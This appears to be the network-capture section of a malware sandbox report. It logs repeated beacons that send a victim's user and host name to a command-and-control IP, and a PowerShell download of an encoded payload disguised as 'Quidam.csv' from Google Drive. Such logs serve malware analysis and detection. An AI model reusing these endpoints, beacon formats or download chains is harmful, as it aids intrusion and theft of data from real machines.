                      Oct 1, 2024 07:45:56.725982904 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:56.725996017 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination Port
                      26192.168.2.749738137.184.191.21580
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:56.868588924 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:56.873549938 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:59.432235956 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:57 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:59.432252884 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:59.432262897 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination Port
                      27192.168.2.749739137.184.191.21580
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:59.599806070 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:59.605782986 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:46:02.166037083 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:46:00 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:46:02.166054010 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:46:02.166065931 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.749700142.250.185.1424437364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      TimestampBytes transferredDirectionData
                      2024-10-01 05:43:51 UTC215OUTGET /uc?export=download&id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJL HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                      Host: drive.google.com
                      Connection: Keep-Alive
                      2024-10-01 05:43:51 UTC1610INHTTP/1.1 303 See Other
                      Content-Type: application/binary
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 01 Oct 2024 05:43:51 GMT
                      Location: https://drive.usercontent.google.com/download?id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJL&export=download
                      Strict-Transport-Security: max-age=31536000
                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                      Cross-Origin-Opener-Policy: same-origin
                      Content-Security-Policy: script-src 'nonce-DL-0shgFWX3bHrTyJvQxRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                      Server: ESF
                      Content-Length: 0
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      X-Content-Type-Options: nosniff
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.749701142.250.181.2254437364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      TimestampBytes transferredDirectionData
                      2024-10-01 05:43:52 UTC233OUTGET /download?id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJL&export=download HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                      Host: drive.usercontent.google.com
                      Connection: Keep-Alive
                      2024-10-01 05:43:54 UTC4850INHTTP/1.1 200 OK
                      Content-Type: application/octet-stream
                      Content-Security-Policy: sandbox
                      Content-Security-Policy: default-src 'none'
                      Content-Security-Policy: frame-ancestors 'none'
                      X-Content-Security-Policy: sandbox
                      Cross-Origin-Opener-Policy: same-origin
                      Cross-Origin-Embedder-Policy: require-corp
                      Cross-Origin-Resource-Policy: same-site
                      X-Content-Type-Options: nosniff
                      Content-Disposition: attachment; filename="Quidam.csv"
                      Access-Control-Allow-Origin: *
                      Access-Control-Allow-Credentials: false
                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                      Accept-Ranges: bytes
                      Content-Length: 491396
                      Last-Modified: Mon, 30 Sep 2024 14:26:17 GMT
                      X-GUploader-UploadID: AD-8lju9s2rV1lF3QckmkOujbpBf89MzCJtkd__u7Gq0-3MT9_9yj1PYlhmVDJHCmKITu3iwADYjBdchbw
                      Date: Tue, 01 Oct 2024 05:43:54 GMT
                      Expires: Tue, 01 Oct 2024 05:43:54 GMT
                      Cache-Control: private, max-age=0
                      X-Goog-Hash: crc32c=y3O9mQ==
                      Server: UploadServer
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-10-01 05:43:54 UTC4850INData Raw: 63 51 47 62 63 51 47 62 75 31 39 6c 46 77 42 78 41 5a 76 72 41 6c 4f 54 41 31 77 6b 42 4f 73 43 64 4e 46 78 41 5a 75 35 72 61 39 32 77 65 73 43 64 65 50 72 41 6e 61 4f 67 66 46 70 35 46 64 63 63 51 47 62 63 51 47 62 67 66 48 45 53 79 47 64 63 51 47 62 63 51 47 62 63 51 47 62 36 77 4a 30 73 62 6f 38 30 71 61 61 63 51 47 62 63 51 47 62 36 77 49 35 43 48 45 42 6d 7a 48 4b 63 51 47 62 36 77 49 61 59 49 6b 55 43 33 45 42 6d 2b 73 43 66 44 72 52 34 75 73 43 55 2f 64 78 41 5a 75 44 77 51 52 78 41 5a 76 72 41 6e 53 47 67 66 6c 68 54 54 59 45 66 4d 76 72 41 6d 6c 5a 36 77 49 54 7a 34 74 45 4a 41 54 72 41 6e 59 6f 36 77 49 43 48 49 6e 44 36 77 49 74 4a 6e 45 42 6d 34 48 44 37 69 77 62 41 65 73 43 6c 70 4c 72 41 75 32 68 75 6c 48 4e 70 6b 78 78 41 5a 76 72 41 68 73
                      Data Ascii: cQGbcQGbu19lFwBxAZvrAlOTA1wkBOsCdNFxAZu5ra92wesCdePrAnaOgfFp5FdccQGbcQGbgfHESyGdcQGbcQGbcQGb6wJ0sbo80qaacQGbcQGb6wI5CHEBmzHKcQGb6wIaYIkUC3EBm+sCfDrR4usCU/dxAZuDwQRxAZvrAnSGgflhTTYEfMvrAmlZ6wITz4tEJATrAnYo6wICHInD6wItJnEBm4HD7iwbAesClpLrAu2hulHNpkxxAZvrAhs
                      2024-10-01 05:43:54 UTC4850INData Raw: 6a 5a 34 47 71 56 32 53 73 6f 50 52 53 6d 48 54 33 4d 4e 69 49 47 63 31 46 41 50 54 7a 70 2b 37 39 58 34 55 6b 31 48 62 37 72 49 5a 32 4f 49 38 66 74 67 42 44 66 72 4d 6f 4d 76 6b 73 6a 30 39 4b 6e 63 76 57 71 71 57 6d 7a 6b 4d 49 73 47 4e 64 4c 4b 58 35 30 53 49 48 51 53 50 48 49 41 33 30 50 47 37 79 31 5a 55 51 74 4f 43 58 78 6b 30 2b 66 31 6c 42 33 70 64 48 73 5a 4b 54 6c 58 69 6d 71 74 64 57 38 6b 35 31 71 71 5a 2f 66 74 47 30 69 39 6f 51 46 49 79 30 49 76 33 70 47 47 79 70 7a 79 56 52 4e 6c 47 61 75 70 6e 70 65 72 47 44 56 30 49 59 67 63 6c 54 55 74 32 62 52 55 45 57 43 6b 66 73 42 62 55 45 4e 41 77 47 61 34 72 41 34 33 75 31 55 33 47 74 42 41 36 52 75 32 71 33 43 52 46 4e 59 70 2b 33 4d 57 63 2b 6e 33 4f 6e 64 2b 43 47 77 64 6b 45 58 32 71 42 41 46
                      Data Ascii: jZ4GqV2SsoPRSmHT3MNiIGc1FAPTzp+79X4Uk1Hb7rIZ2OI8ftgBDfrMoMvksj09KncvWqqWmzkMIsGNdLKX50SIHQSPHIA30PG7y1ZUQtOCXxk0+f1lB3pdHsZKTlXimqtdW8k51qqZ/ftG0i9oQFIy0Iv3pGGypzyVRNlGaupnperGDV0IYgclTUt2bRUEWCkfsBbUENAwGa4rA43u1U3GtBA6Ru2q3CRFNYp+3MWc+n3Ond+CGwdkEX2qBAF
                      2024-10-01 05:43:54 UTC152INData Raw: 53 47 44 38 2b 72 66 56 56 4c 35 4f 30 62 7a 30 74 68 5a 52 2b 37 66 56 76 50 75 33 31 62 7a 37 74 39 57 38 2b 37 66 56 76 50 75 33 31 62 7a 37 74 39 57 38 2b 37 66 56 76 50 75 6a 66 76 32 6b 6c 73 69 64 30 77 38 30 70 64 2f 68 61 7a 73 70 72 6d 6b 39 44 54 35 76 69 32 38 32 4f 2f 53 6d 6d 66 30 31 37 52 42 53 58 5a 50 71 51 63 6e 33 62 61 52 43 6e 4f 78 32 39 65 4f 2f 4a 6c 33 77 64 48 38 6a 73 2f 56 5a 4a 72 57 75 72 31 6e 6f 51 77 50 4c 4d 6e 76 55
                      Data Ascii: SGD8+rfVVL5O0bz0thZR+7fVvPu31bz7t9W8+7fVvPu31bz7t9W8+7fVvPujfv2klsid0w80pd/hazsprmk9DT5vi282O/Smmf017RBSXZPqQcn3baRCnOx29eO/Jl3wdH8js/VZJrWur1noQwPLMnvU
                      2024-10-01 05:43:54 UTC1390INData Raw: 69 34 6e 70 58 76 76 2f 50 6c 44 51 2b 72 66 56 37 30 41 78 4a 49 78 71 4e 69 62 65 30 72 2f 6a 50 51 69 2f 79 32 50 2b 4e 68 62 61 50 6b 37 6d 50 52 44 65 66 6c 77 74 50 74 5a 77 44 69 56 6e 34 67 44 45 73 61 58 2b 4d 63 69 2f 4e 52 72 73 34 53 71 75 4c 74 78 58 4d 6d 45 49 2b 38 2b 4f 53 79 51 31 79 6c 67 54 2f 42 50 6e 6b 31 69 46 76 43 57 34 30 7a 6b 52 74 39 57 38 2b 37 66 56 76 50 75 33 31 62 7a 37 74 39 57 38 2b 37 66 56 76 50 75 33 31 62 7a 37 74 39 57 38 2b 37 66 48 73 66 65 34 6e 69 48 7a 52 6e 47 2b 65 6f 50 78 4b 41 32 30 6c 7a 33 50 6b 36 52 4f 34 58 46 55 6b 4e 2b 39 67 61 57 68 35 6d 7a 68 31 71 44 31 50 51 72 64 2b 74 42 4a 4e 6a 77 4e 75 38 31 48 4e 63 4c 76 53 59 50 50 72 35 48 68 48 35 47 43 48 66 76 57 65 2f 33 4a 47 7a 44 57 51 6d 75
                      Data Ascii: i4npXvv/PlDQ+rfV70AxJIxqNibe0r/jPQi/y2P+NhbaPk7mPRDeflwtPtZwDiVn4gDEsaX+Mci/NRrs4SquLtxXMmEI+8+OSyQ1ylgT/BPnk1iFvCW40zkRt9W8+7fVvPu31bz7t9W8+7fVvPu31bz7t9W8+7fHsfe4niHzRnG+eoPxKA20lz3Pk6RO4XFUkN+9gaWh5mzh1qD1PQrd+tBJNjwNu81HNcLvSYPPr5HhH5GCHfvWe/3JGzDWQmu
                      2024-10-01 05:43:54 UTC1390INData Raw: 4e 45 51 64 6f 2b 30 6e 75 35 2f 78 52 76 59 35 55 72 79 62 6d 39 7a 64 47 6e 47 68 4c 76 54 6f 72 78 79 4c 44 38 59 37 78 6d 6e 4c 77 35 4b 75 33 74 55 71 42 49 59 50 7a 36 74 39 56 77 62 71 73 4f 48 72 59 33 79 70 33 6a 4d 75 69 4c 30 33 69 47 30 31 61 55 6d 4e 68 49 4b 61 6b 4b 79 56 76 73 41 5a 55 41 68 32 2f 70 76 56 35 78 72 4b 79 30 78 4d 69 31 50 64 49 50 73 39 55 33 76 4c 74 63 4f 59 75 32 31 62 77 33 66 68 6c 65 64 70 4f 6e 31 37 75 7a 6f 4b 4f 2b 4e 50 39 45 44 35 48 4e 47 49 4a 4b 68 47 69 58 51 32 69 32 35 41 51 6d 43 47 71 2b 62 64 50 63 6a 2b 63 6e 58 38 61 45 50 70 72 62 37 4e 68 77 38 70 48 38 71 67 35 74 6f 65 34 2b 56 48 30 6f 73 43 4f 69 65 6b 61 44 71 39 44 46 56 45 32 78 5a 5a 66 44 65 6e 61 38 6e 47 62 74 68 79 42 79 56 64 53 32 5a
                      Data Ascii: NEQdo+0nu5/xRvY5Urybm9zdGnGhLvTorxyLD8Y7xmnLw5Ku3tUqBIYPz6t9VwbqsOHrY3yp3jMuiL03iG01aUmNhIKakKyVvsAZUAh2/pvV5xrKy0xMi1PdIPs9U3vLtcOYu21bw3fhledpOn17uzoKO+NP9ED5HNGIJKhGiXQ2i25AQmCGq+bdPcj+cnX8aEPprb7Nhw8pH8qg5toe4+VH0osCOiekaDq9DFVE2xZZfDena8nGbthyByVdS2Z
                      2024-10-01 05:43:54 UTC1390INData Raw: 37 2f 63 35 50 51 79 71 72 54 61 42 35 30 6b 31 47 37 37 74 49 5a 30 79 46 4d 6e 31 4b 72 6d 33 73 6b 6d 70 49 64 2f 72 57 73 52 76 46 50 37 4d 35 6b 4a 4a 63 33 54 77 79 38 55 7a 6c 50 65 5a 31 70 79 6c 46 2b 71 4b 66 37 74 35 4d 49 4d 39 68 73 66 52 76 76 75 33 32 6a 48 34 52 64 47 38 6f 7a 49 57 34 33 71 7a 38 64 50 49 70 34 50 76 51 4b 42 30 62 48 55 32 50 6a 79 65 54 47 63 39 43 4c 69 2f 45 69 4d 32 50 69 53 72 7a 4e 62 71 5a 7a 34 7a 74 65 55 71 73 7a 6b 44 79 4e 6b 2b 2f 66 4a 69 48 51 64 64 34 50 49 34 46 31 5a 48 61 6a 75 6f 4b 6a 69 43 76 5a 79 32 59 66 71 56 51 7a 6a 41 39 56 70 63 78 4d 69 5a 71 59 45 2b 48 34 38 70 34 6e 35 75 6a 74 53 33 39 42 4f 57 71 51 32 77 51 6a 66 61 56 45 34 6b 32 41 73 59 65 6b 57 68 65 61 38 64 56 48 35 52 48 32 38
                      Data Ascii: 7/c5PQyqrTaB50k1G77tIZ0yFMn1Krm3skmpId/rWsRvFP7M5kJJc3Twy8UzlPeZ1pylF+qKf7t5MIM9hsfRvvu32jH4RdG8ozIW43qz8dPIp4PvQKB0bHU2PjyeTGc9CLi/EiM2PiSrzNbqZz4zteUqszkDyNk+/fJiHQdd4PI4F1ZHajuoKjiCvZy2YfqVQzjA9VpcxMiZqYE+H48p4n5ujtS39BOWqQ2wQjfaVE4k2AsYekWhea8dVH5RH28
                      2024-10-01 05:43:54 UTC1390INData Raw: 6b 31 47 72 37 45 49 58 39 6c 6f 5a 45 4c 76 61 4f 63 70 35 61 75 53 6e 77 79 79 6b 6f 67 67 57 50 5a 48 4e 68 34 39 32 78 35 59 46 6f 42 6b 41 68 64 45 49 42 35 74 43 6e 42 6c 42 34 47 58 51 47 36 72 74 42 74 68 52 48 36 54 54 30 42 34 33 53 4c 6d 75 37 73 62 36 45 32 4a 4c 55 6e 6e 45 50 72 52 42 79 58 39 63 45 32 49 75 2b 71 32 43 30 39 46 4d 7a 46 76 55 63 32 49 6f 4a 32 6b 74 4d 31 78 4a 33 63 4b 50 50 4a 57 42 59 38 39 7a 75 6f 30 48 33 4a 55 6c 50 62 48 35 6b 64 50 51 49 64 58 56 6b 47 2b 59 4c 63 7a 55 44 75 33 49 55 7a 5a 30 6e 59 68 73 54 4a 53 4f 4e 36 64 67 63 39 50 4b 6e 61 76 65 4f 2f 31 62 7a 37 74 39 57 38 2b 37 66 56 76 50 75 33 31 62 7a 37 74 39 57 38 2b 37 66 56 76 50 75 33 31 62 7a 37 74 39 57 76 37 61 69 59 4e 5a 78 56 30 34 61 71 50
                      Data Ascii: k1Gr7EIX9loZELvaOcp5auSnwyykoggWPZHNh492x5YFoBkAhdEIB5tCnBlB4GXQG6rtBthRH6TT0B43SLmu7sb6E2JLUnnEPrRByX9cE2Iu+q2C09FMzFvUc2IoJ2ktM1xJ3cKPPJWBY89zuo0H3JUlPbH5kdPQIdXVkG+YLczUDu3IUzZ0nYhsTJSON6dgc9PKnaveO/1bz7t9W8+7fVvPu31bz7t9W8+7fVvPu31bz7t9Wv7aiYNZxV04aqP
                      2024-10-01 05:43:54 UTC1390INData Raw: 74 39 57 38 2b 37 66 56 76 50 75 33 32 5a 73 6b 54 69 59 4e 51 49 66 34 49 44 6c 6d 62 4b 5a 79 77 54 46 4d 35 51 6c 65 4d 61 36 31 31 62 79 70 44 5a 38 64 74 6b 4a 55 54 72 43 2f 68 34 64 36 52 51 67 62 4c 32 70 55 54 67 56 33 48 71 39 79 76 57 61 56 4d 61 54 68 70 4e 36 4b 32 65 38 33 69 76 67 2f 74 71 45 54 74 4c 4c 6e 70 6c 70 4e 69 49 62 4f 32 75 54 51 6b 38 32 70 6c 4e 31 45 45 76 33 6d 4e 30 4b 67 6d 6a 37 67 70 79 59 66 58 6f 6a 67 4f 68 77 53 66 33 77 76 38 59 52 6e 4e 6d 74 42 34 59 6a 56 4a 69 63 47 46 67 4d 62 76 73 2f 39 7a 6c 36 34 39 55 77 2f 66 36 52 7a 49 36 45 6d 63 67 70 38 76 66 75 33 58 46 75 73 50 47 67 56 2b 72 66 56 4e 57 34 33 31 4c 7a 37 50 67 2f 75 63 43 4a 56 76 66 75 33 67 67 50 31 48 4c 39 49 65 6b 42 4c 4a 6e 73 68 56 46 50
                      Data Ascii: t9W8+7fVvPu32ZskTiYNQIf4IDlmbKZywTFM5QleMa611bypDZ8dtkJUTrC/h4d6RQgbL2pUTgV3Hq9yvWaVMaThpN6K2e83ivg/tqETtLLnplpNiIbO2uTQk82plN1EEv3mN0Kgmj7gpyYfXojgOhwSf3wv8YRnNmtB4YjVJicGFgMbvs/9zl649Uw/f6RzI6Emcgp8vfu3XFusPGgV+rfVNW431Lz7Pg/ucCJVvfu3ggP1HL9IekBLJnshVFP
